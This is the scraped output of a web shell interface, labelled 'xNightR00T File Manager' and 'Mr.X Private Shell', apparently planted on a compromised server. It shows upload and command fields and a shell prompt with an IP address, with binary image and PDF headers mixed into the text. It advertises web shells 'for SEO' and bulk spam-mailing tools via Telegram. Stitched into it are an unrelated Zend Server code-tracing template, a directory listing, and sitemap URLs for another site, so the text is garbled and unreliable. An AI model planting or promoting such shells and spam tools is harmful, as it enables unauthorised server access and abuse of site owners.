xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<page-header title="Traces" description="
             Code Tracing is an in-depth diagnostic tool that enables real-time execution flow-recording in 
             production environments, that allows you to drill-down to the function level to view actual 
             performance-related information and statistics. Code Tracing focuses on collecting key data 
             points, such as application functions and main PHP function calls, high-resolution timing and 
             memory usage of execution elements, and key PHP engine services such as Web server interface calls.
             " read-more-link="{{helpLinkService.get('code_tracing')}}"></page-header>

<div id="codetracing-manual-trace-form">
    <form ng-submit="manualRequest.create()">
        <input type="submit" class="hidden">
        <div id="codetracing-manual-trace-form-first-row">
            <span id="codetracing-recent-manual-code-traces-button" 
                  title="Show recent manual requests"
                  ng-show="!manualRequest.recentCodeTracesAreDisplayed && manualRequest.recentCodeTraces.length > 0" 
                  ng-disabled="manualRequest.recentCodeTraces.length == 0"
                  ng-click="manualRequest.showRecentCodeTraces()">
                <i class="fa fa-chevron-down" aria-hidden="true"></i>
            </span>
            <span id="codetracing-recent-manual-code-traces-button" 
                  title="Hide recent manual requests"
                  ng-show=" manualRequest.recentCodeTracesAreDisplayed"
                  ng-click="manualRequest.hideRecentCodeTraces()">
                <i class="fa fa-chevron-up" aria-hidden="true"></i>
            </span>
            <div id="codetracing-recent-manual-code-traces" ng-show="manualRequest.recentCodeTracesAreDisplayed">
                <ul>
                    <li ng-repeat="recentCodeTrace in manualRequest.recentCodeTraces" ng-click="manualRequest.assignRecentCodeTrace(recentCodeTrace)" 
                        title="{{ recentCodeTrace.titleAttribute}}">
                        <a href="javascript:;"><span class="codetracing-manual-request-method">{{ recentCodeTrace.method}}</span> {{recentCodeTrace.url}}</a>
                    </li>
                </ul>
            </div>
            <input type="text" id="codetracing-manual-trace-input" 
                   ng-model="manualRequest.url" 
                   ng-dblclick="manualRequest.toggleRecentCodeTraces()"
                   placeholder="URL to trace. E.g. http://hostname:port/path?get_parameter=value" 
                   autocomplete="off" />
            <select zend-select ng-model="manualRequest.method">
                <option value="get">GET Request</option>
                <option value="post">POST Request</option>
            </select>
            <select zend-select ng-model="manualRequest.type">
                <option value="codetracing">Code tracing</option>
                <option value="profiledata">Profile data</option>
            </select>
            <span permission-tooltip condition="!isCollectAllowed">
                <a class="btn btn-default" ng-click="manualRequest.create()" ng-disabled="manualRequest.inProgress || !isCollectAllowed" title="Create new trace">Create trace <i class="fa fa-spinner fa-spin" ng-show="manualRequest.inProgress"></i></a>
            </span>
        </div>
        <div ng-show="manualRequest.method == 'post'" class="codetracing-manual-form-second-row">
            <input type="text" id="codetracing-manual-trace-parameters-input" ng-model="manualRequest.parameters" placeholder="Post parameters. E.g. key1=value1&key2=value2" />
        </div>
    </form>
</div>

<div id="codetracing-traces-list">
    <!-- Toolbar -->
    <div id="codetracing-toolbar">
        <div id="codetracing-toolbar-right-side">
            <select zend-select id="codetracing-list-type" ng-model="list.selectedType">
                <option value="-1">All Types</option>
                <option ng-repeat="traceType in list.traceTypes" value="{{traceType.id}}">{{traceType.name}}</option>
            </select>
            <input type="text" ng-model="list.searchText" title="Search trace" placeholder="Search..." />
        </div>
        <span permission-tooltip condition="!isDeleteAllowed">
            <a class="btn btn-default" id="codetracing-delete-button" ng-disabled="!isDeleteAllowed" ng-click="list.deleteRows(list.getSelectedRowsIds())" title="Delete selected Traces">Delete</a>
        </span>
        <span ng-show="list.showLoadingSpinner"><i class="fa fa-spinner fa-spin"></i> Loading...</span>
    </div>

    <!-- The grid -->
    <!--
    <div class="codetracing-grid-curtain" ng-show="list.displayListCurtain" style="width: 100%; height: {{list.tableHeight}}px"></div>
    <div class="codetracing-grid-curtain-text" ng-show="list.displayListCurtain" style="width: 100%; height: {{list.tableHeight}}px; line-height: {{list.tableHeight}}px"><i class="fa fa-spinner fa-spin"></i> Loading...</div>
    -->
    <div id="codetracing-list-grid" ui-grid="list.grid" ui-grid-auto-resize class="auto-height">
        <div class="ui-grid-empty" ng-show="!list.initialLoad && list.grid.data.length == 0">No results were found.</div>
        <div class="ui-grid-empty" ng-show="list.initialLoad"><i class="fa fa-spinner fa-spin"></i> Loading...</div>
    </div>

    <zend-pagination pagination-options="list.paginationOptions"></zend-pagination>
</div>

Filemanager

Name Type Size Permission Actions
codetracing_parts Folder 0755
index.html File 8.57 KB 0644
list.html File 5.33 KB 0644
settings.html File 25.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml